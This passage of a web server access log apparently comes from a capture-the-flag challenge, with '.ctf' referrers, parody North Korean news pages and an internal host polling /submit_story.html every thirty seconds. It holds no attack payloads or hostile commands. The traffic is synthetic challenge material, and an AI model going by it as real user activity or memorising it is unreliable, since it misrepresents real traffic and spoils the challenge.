Firefox/50.0" +192.168.51.66 - - [23/Jul/2020:11:46:26 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +253.104.15.21 - - [23/Jul/2020:11:46:28 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.0" 200 2688 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17" +115.17.158.206 - - [23/Jul/2020:11:46:29 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.0" 200 7757 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +176.156.92.184 - - [23/Jul/2020:11:46:31 -0500] "GET /en/quality-waterproof-liquid-made/ HTTP/1.1" 200 2826 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +204.46.160.206 - - [23/Jul/2020:11:46:33 -0500] "GET /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.0" 200 4162 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +43.123.32.24 - - [23/Jul/2020:11:46:36 -0500] "POST /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 6247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +96.209.83.207 - - [23/Jul/2020:11:46:38 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 7176 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +5.176.134.84 - - [23/Jul/2020:11:46:41 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 5488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +135.97.123.202 - - [23/Jul/2020:11:46:45 -0500] "GET /deep-pan-or-classic/ HTTP/1.1" 200 5839 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +156.66.122.144 - - [23/Jul/2020:11:46:47 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 6211 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +241.41.136.41 - - [23/Jul/2020:11:46:48 -0500] "GET /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 400 5576 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +62.41.211.52 - - [23/Jul/2020:11:46:50 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 400 13948 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +224.178.227.67 - - [23/Jul/2020:11:46:51 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 301 12605 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +252.11.1.78 - - [23/Jul/2020:11:46:54 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 13235 "http://www.nkcna.ctf" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" +192.168.51.66 - - [23/Jul/2020:11:46:56 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +45.113.115.161 - - [23/Jul/2020:11:46:57 -0500] "POST /kim-jong-fun/ HTTP/1.1" 200 9584 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +136.86.221.45 - - [23/Jul/2020:11:47:01 -0500] "GET /en/3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 404 13692 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +188.216.154.149 - - [23/Jul/2020:11:47:03 -0500] "GET /en/99-problems/ HTTP/1.1" 200 2742 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +163.163.53.251 - - [23/Jul/2020:11:47:07 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 301 2205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +78.233.237.61 - - [23/Jul/2020:11:47:10 -0500] "GET /en/ HTTP/1.1" 200 4716 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +156.146.241.240 - - [23/Jul/2020:11:47:13 -0500] "GET /en/kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 6788 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +20.190.87.53 - - [23/Jul/2020:11:47:16 -0500] "POST /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 7190 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" +67.172.99.168 - - [23/Jul/2020:11:47:19 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.0" 200 8550 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +22.72.234.191 - - [23/Jul/2020:11:47:23 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 400 9454 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +192.168.51.66 - - [23/Jul/2020:11:47:27 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +176.187.249.141 - - [23/Jul/2020:11:47:27 -0500] "POST /pyingpong-puppet-company/ HTTP/1.1" 200 12957 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +179.47.13.53 - - [23/Jul/2020:11:47:29 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 12941 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +216.56.49.180 - - [23/Jul/2020:11:47:30 -0500] "GET /en/tablet-computer-popular-in-dprk/ HTTP/1.0" 200 6558 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +250.136.7.228 - - [23/Jul/2020:11:47:34 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 500 5371 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +125.76.100.46 - - [23/Jul/2020:11:47:35 -0500] "GET /en/kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.0" 200 6813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +106.96.36.180 - - [23/Jul/2020:11:47:36 -0500] "GET / HTTP/1.1" 200 2471 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +28.96.48.200 - - [23/Jul/2020:11:47:39 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 6972 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +20.237.10.70 - - [23/Jul/2020:11:47:42 -0500] "GET /en/greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 6549 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +123.141.214.76 - - [23/Jul/2020:11:47:44 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 14102 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +107.242.71.242 - - [23/Jul/2020:11:47:48 -0500] "GET /en/tele-education-system-upgraded/ HTTP/1.1" 200 9279 "-" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +68.146.55.175 - - [23/Jul/2020:11:47:49 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.1" 200 9700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +87.116.47.112 - - [23/Jul/2020:11:47:51 -0500] "GET /en/ HTTP/1.1" 200 6095 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +191.116.10.82 - - [23/Jul/2020:11:47:55 -0500] "GET /tele-education-system-upgraded/ HTTP/1.0" 500 11028 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:47:57 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +47.70.161.197 - - [23/Jul/2020:11:47:59 -0500] "POST /latest-rocket/ HTTP/1.1" 404 6262 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +233.224.65.121 - - [23/Jul/2020:11:48:00 -0500] "POST /north-kiringul-missile-program/ HTTP/1.1" 200 2704 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +204.84.30.136 - - [23/Jul/2020:11:48:02 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.0" 200 14903 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +27.174.214.45 - - [23/Jul/2020:11:48:04 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 8139 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +156.53.11.77 - - [23/Jul/2020:11:48:06 -0500] "POST /en/tele-education-system-upgraded/ HTTP/1.1" 200 9628 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +110.62.143.185 - - [23/Jul/2020:11:48:09 -0500] "GET /deep-pan-or-classic/ HTTP/1.1" 200 7426 "http://www.google.ctf" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +154.50.236.150 - - [23/Jul/2020:11:48:11 -0500] "POST /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 5357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +125.97.99.159 - - [23/Jul/2020:11:48:14 -0500] "GET /99-problems/ HTTP/1.1" 200 4311 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +177.183.88.225 - - [23/Jul/2020:11:48:16 -0500] "GET / HTTP/1.1" 200 4785 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" +54.194.124.9 - - [23/Jul/2020:11:48:17 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 3483 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +108.56.95.223 - - [23/Jul/2020:11:48:20 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 400 14411 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +18.142.207.230 - - [23/Jul/2020:11:48:22 -0500] "POST /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 5418 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +205.25.240.139 - - [23/Jul/2020:11:48:26 -0500] "POST /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 2519 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:48:27 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +36.189.192.233 - - [23/Jul/2020:11:48:30 -0500] "POST /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.0" 200 12825 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +83.135.142.78 - - [23/Jul/2020:11:48:31 -0500] "GET /99-problems/ HTTP/1.1" 200 4849 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +119.207.119.214 - - [23/Jul/2020:11:48:34 -0500] "POST /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 3816 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +146.38.145.252 - - [23/Jul/2020:11:48:35 -0500] "POST /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 500 6682 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +112.61.117.250 - - [23/Jul/2020:11:48:39 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 9506 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +197.155.178.231 - - [23/Jul/2020:11:48:42 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 12030 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +50.236.73.231 - - [23/Jul/2020:11:48:45 -0500] "GET / HTTP/1.1" 200 13256 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +65.4.244.53 - - [23/Jul/2020:11:48:47 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 6707 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +235.109.21.140 - - [23/Jul/2020:11:48:48 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" +124.142.110.27 - - [23/Jul/2020:11:48:51 -0500] "POST /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 2796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +158.188.60.64 - - [23/Jul/2020:11:48:55 -0500] "GET /99-problems/ HTTP/1.1" 200 14188 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:48:57 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +203.172.164.246 - - [23/Jul/2020:11:48:59 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 400 13244 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +195.100.175.152 - - [23/Jul/2020:11:49:02 -0500] "GET /en/royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 13693 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +199.42.105.132 - - [23/Jul/2020:11:49:03 -0500] "GET /en/distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 3491 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +39.135.93.243 - - [23/Jul/2020:11:49:05 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 9242 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +125.8.234.175 - - [23/Jul/2020:11:49:07 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 14828 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +217.160.35.59 - - [23/Jul/2020:11:49:08 -0500] "GET /en/stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 3924 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +228.72.178.115 - - [23/Jul/2020:11:49:10 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 9434 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +101.224.52.46 - - [23/Jul/2020:11:49:13 -0500] "GET / HTTP/1.1" 200 10395 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +182.140.180.190 - - [23/Jul/2020:11:49:15 -0500] "GET /en/new-medicine-developed-in-dprk/ HTTP/1.1" 200 2659 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +157.6.51.239 - - [23/Jul/2020:11:49:18 -0500] "POST /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.0" 200 2041 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +26.241.149.250 - - [23/Jul/2020:11:49:20 -0500] "GET /en/many-medical-scientific-achievements-made/ HTTP/1.0" 200 4330 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +249.63.57.200 - - [23/Jul/2020:11:49:24 -0500] "POST /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 14770 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +192.168.51.66 - - [23/Jul/2020:11:49:27 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +233.116.103.196 - - [23/Jul/2020:11:49:27 -0500] "POST /north-kiringul-air-force/ HTTP/1.1" 200 8229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +138.160.133.152 - - [23/Jul/2020:11:49:28 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 403 4790 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +30.161.110.108 - - [23/Jul/2020:11:49:32 -0500] "GET / HTTP/1.1" 200 6563 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +147.247.154.93 - - [23/Jul/2020:11:49:37 -0500] "GET /en/dancing-parties-held/ HTTP/1.1" 200 3662 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +55.100.220.99 - - [23/Jul/2020:11:49:38 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 7567 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +25.154.6.230 - - [23/Jul/2020:11:49:40 -0500] "POST /en/kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.0" 304 5517 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +117.195.155.112 - - [23/Jul/2020:11:49:42 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 8420 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +253.42.90.56 - - [23/Jul/2020:11:49:46 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 400 6033 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +147.217.80.143 - - [23/Jul/2020:11:49:49 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +17.168.111.14 - - [23/Jul/2020:11:49:53 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 2741 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +122.64.187.113 - - [23/Jul/2020:11:49:54 -0500] "GET /en/new-national-record-set-in-archery/ HTTP/1.1" 400 12499 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +45.205.230.56 - - [23/Jul/2020:11:49:57 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 9171 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +192.168.51.66 - - [23/Jul/2020:11:49:57 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +120.152.164.155 - - [23/Jul/2020:11:49:58 -0500] "GET /dancing-parties-held/ HTTP/1.1" 200 13380 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +9.192.35.167 - - [23/Jul/2020:11:50:00 -0500] "GET /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 12226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +234.129.207.223 - - [23/Jul/2020:11:50:04 -0500] "GET /en/quality-waterproof-liquid-made/ HTTP/1.1" 200 9641 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +187.149.39.118 - - [23/Jul/2020:11:50:07 -0500] "POST /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 12585 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +202.87.188.63 - - [23/Jul/2020:11:50:08 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 3655 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +135.179.201.54 - - [23/Jul/2020:11:50:11 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 3695 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +161.42.116.152 - - [23/Jul/2020:11:50:13 -0500] "POST /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 9706 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +251.141.230.136 - - [23/Jul/2020:11:50:14 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 403 8755 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36" +4.162.55.222 - - [23/Jul/2020:11:50:15 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 9020 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +49.191.59.158 - - [23/Jul/2020:11:50:19 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 2200 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +158.205.121.204 - - [23/Jul/2020:11:50:21 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 2650 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +77.7.183.243 - - [23/Jul/2020:11:50:24 -0500] "GET /north-kiringul-missile-program/ HTTP/1.1" 200 13907 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +192.168.51.66 - - [23/Jul/2020:11:50:27 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +20.231.156.224 - - [23/Jul/2020:11:50:28 -0500] "GET /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 200 11621 "http://www.yahoo.ctf" 